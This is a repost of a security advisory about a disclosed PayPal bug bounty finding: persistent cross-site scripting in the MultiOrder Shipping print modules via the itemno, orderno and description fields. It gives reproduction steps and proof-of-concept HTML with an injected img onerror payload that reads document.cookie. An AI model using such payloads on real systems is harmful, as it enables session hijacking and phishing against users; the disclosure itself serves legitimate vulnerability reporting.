PayPal Bug Bounty Reward – Print Layout Vulnerabilities

Editorial_Staff_Team's picture

PayPal Bug Bounty Reward – Print Layout Vulnerabilities

The Vulnerability Laboratory research team discovered end of july multiple persistent input validation web vulnerabilities in an official PayPal Inc core web-application module. The vulnerability is located in the Print Packing Slips and Print Selected module when processing to request via POST method manipulated itemno, orderno, order or description parameters.

The remote attacker can inject the malicious payload (script code) as profile shipping pickup values or item details. The effect of the inject will only be visible in the print of the application and executes from the bottom of the generated print results list. Exploitation of the persistent web vulnerability requires a low privileged web application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script codes or persistent web module context manipulation.

Vulnerable Service(s):
[+] Paypal Inc - PayPal MultiOrder Shipping Application (Core & API) 

Vulnerable Module(s):
[+] Print Packing Slips
[+] Print Selected Context

Vulnerable Parameter(s):
[+] itemno
[+] orderno
[+] description

Affected Module(s):
[+] Print Listing - All or Selected
[+] Print Bottom Listing (Separat)

Manual steps to reproduce the remote vulnerability ...

1. Register a US Paypal account and activate the shipping tools module
2. Open it up and inject as order number, item number and description your own script code as payload
3. Open the Print Packing Slips or Print Selected module to list the already injected payload
4. A new separate window opens on print selected values of the shipping request
5. The injected payload will be executed in the bottom of the print listing
6. Successful reproduced!

PoC: PACKING SLIP - Print All

<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips%20-poc_files/honey8.htm" 
border="0"></td><td 
valign="bottom">"/><br>"/>a%20/>">
<img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips%20-poc_files/t.htm" 
onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1><br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"/>, 
TX 77550</td>
<td align="right" valign="bottom">PACKING SLIP</td></tr>
...    ...
<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/honey8.htm" 
border="0"></td><td 
valign="bottom">"/><br>"/>a%20/>">
<img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/t.htm" 
onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1><br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"/>, 
TX 77550</td>
<td align="right" valign="bottom">PACKING SLIP</td></tr>
...    ...
<tr><td width="1*">&#8203;&#8203;&#8203;&#8203;&#8203;<img src="http://vulnerability-lab.com/honey8.html" 
border="0"></td><td valign="bottom">"/><br>"/>a%20/>">
<img src="t.png" onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1>
&#8203;&#8203;&#8203;&#8203;&#8203;<br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"
/>, TX 77550</td><td align="right" valign="bottom">PACKING SLIP</td></tr>

PoC: PACKING SLIP - Print Selected

<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/honey8.htm" 
border="0"></td>
<td valign="bottom"></td><td align="right" valign="bottom">PACKING SLIP</td></tr>

 

 

Rate this article: 
Average: 3.8 (4 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.